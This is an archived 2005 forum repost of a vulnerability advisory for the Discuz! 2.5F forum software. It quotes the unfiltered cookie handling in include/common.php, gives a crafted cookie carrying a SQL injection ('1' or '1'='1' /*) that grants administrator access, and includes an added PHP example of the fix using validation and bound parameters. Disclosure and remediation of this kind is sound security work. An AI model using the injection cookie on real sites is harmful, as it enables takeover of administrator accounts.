EvilOctal Security Team Technical Discussion Group's Archiver

宿心劫 2005-1-31 12:17

[Repost] Discuz! 2.5F unfiltered cookie vulnerability

Vulnerability provided by: 火狐技术联盟 (Firefox Technology Alliance) - 我非我 [[url]www.wrsky.com[/url]]

Vulnerability summary:
The new Discuz! 2.5F forum release does not filter COOKIE values; by constructing a cookie locally, administrator privileges can be obtained.

Details:
In the file include\common.php, at line 87:

=================================code begin==========================================================
$discuz_uid = $_COOKIE['_discuz_uid'];  // no filtering or validation is performed here
$discuz_pw = $_COOKIE['_discuz_pw'];
$discuz_secques = $_COOKIE['_discuz_secques'];

$newpm = $newpmexists = $sessionexists = $adminid = $adminglobal = 0;

$userinfo="m.uid AS discuz_uid, m.username AS discuz_user, m.password AS discuz_pw, m.adminid, m.groupid, m.email, m.timeoffset,m.tpp, m.ppp, m.credit, m.timeformat, m.dateformat, m.signature, m.invisible, m.lastvisit, m.lastpost, m.newpm, m.accessmasks, m.regdate";
// and here the values are placed straight into the MySQL query and executed..
if($sid) {
    if($discuz_uid) {
        $query = $db->query("SELECT s.sid, s.styleid, s.groupid='6' AS ipbanned, $userinfo FROM $table_sessions s, $table_members m WHERE m.uid=s.uid AND s.sid='$sid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip' AND m.uid='$discuz_uid' AND m.password='$discuz_pw' AND m.secques='$discuz_secques'");
    } else {
        $query = $db->query("SELECT sid, uid AS sessionuid, groupid, groupid='6' AS ipbanned, styleid FROM $table_sessions WHERE sid='$sid' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'");
    }
    if($_DSESSION = $db->fetch_array($query)) {
        $sessionexists = 1;
        if(!empty($_DSESSION['sessionuid'])) {
            $query = $db->query("SELECT $userinfo FROM $table_members m WHERE uid='$_DSESSION[sessionuid]'");
            $_DSESSION = array_merge($_DSESSION, $db->fetch_array($query));
        }
    } else {
        $query = $db->query("SELECT sid, groupid, groupid='6' AS ipbanned, styleid FROM $table_sessions WHERE sid='$sid' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'");
        if($_DSESSION = $db->fetch_array($query)) {
            clearcookies();
            $sessionexists = 1;
        }
    }
}
if(!$sessionexists) {

..........................................

====================================code end==========================================================



Locally constructed cookie:

sid=dAgM7P; _cookietime=2592000; expand_menu=0__3; _discuz_uid=1' or '1'='1' /*; _discuz_pw=wofeiwo; _discuz_secques=hehe
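The root cause above is that cookie values reach the query as raw string fragments. The following is an added example, not code from the original post or from Discuz!, showing how the same lookup can be hardened: validate each cookie against the format the application actually stores (assumed here to be an integer uid and hex digests for the password and security-question values) and bind the values as query parameters. It assumes PDO with the sqlite driver so it runs offline; the table name `members` and its columns are constructed stand-ins for the real $table_members.

```php
<?php
// Added example (not Discuz! code): validate the three cookies before they
// reach SQL, then bind them as parameters instead of interpolating them.
// Assumption: password/secques cookies are hex digests (max 32 chars).

function read_discuz_cookies(array $cookie): ?array {
    // _discuz_uid must be a pure integer; a value such as "1' or '1'='1' /*"
    // is rejected here and never reaches the database. Worth logging.
    if (!isset($cookie['_discuz_uid']) || !ctype_digit((string)$cookie['_discuz_uid'])) {
        return null;
    }
    // Password hash and security-question hash: restrict to the character
    // set the application stores (assumed hex digest), nothing else.
    foreach (['_discuz_pw', '_discuz_secques'] as $name) {
        if (!isset($cookie[$name]) || !preg_match('/^[0-9a-f]{0,32}$/i', $cookie[$name])) {
            return null;
        }
    }
    return [
        'uid'     => (int)$cookie['_discuz_uid'],
        'pw'      => $cookie['_discuz_pw'],
        'secques' => $cookie['_discuz_secques'],
    ];
}

function lookup_member(PDO $db, array $c): ?array {
    // Parameter binding: the cookie values can never alter the query structure.
    $stmt = $db->prepare(
        'SELECT uid, username, adminid FROM members WHERE uid = :uid AND password = :pw AND secques = :secques'
    );
    $stmt->execute([':uid' => $c['uid'], ':pw' => $c['pw'], ':secques' => $c['secques']]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite table (stand-in for $table_members).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE members (uid INTEGER, username TEXT, password TEXT, secques TEXT, adminid INTEGER)');
$db->exec("INSERT INTO members VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99', '', 1)");

// The cookie from the advisory: rejected by validation before any SQL runs.
$injected = ['_discuz_uid' => "1' or '1'='1' /*", '_discuz_pw' => 'wofeiwo', '_discuz_secques' => 'hehe'];
var_dump(read_discuz_cookies($injected));

// A well-formed cookie for the demo row: passes validation and matches via bound parameters.
$legit = ['_discuz_uid' => '1', '_discuz_pw' => '5f4dcc3b5aa765d61d8327deb882cf99', '_discuz_secques' => ''];
$c = read_discuz_cookies($legit);
var_dump($c !== null && lookup_member($db, $c) !== null);
```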



Vulnerability demo video download:

[url]http://fox.wrsky.com/attachments/month_0501/if8l_Discuz25F.rar[/url]

© 1999-2008 EvilOctal Security Team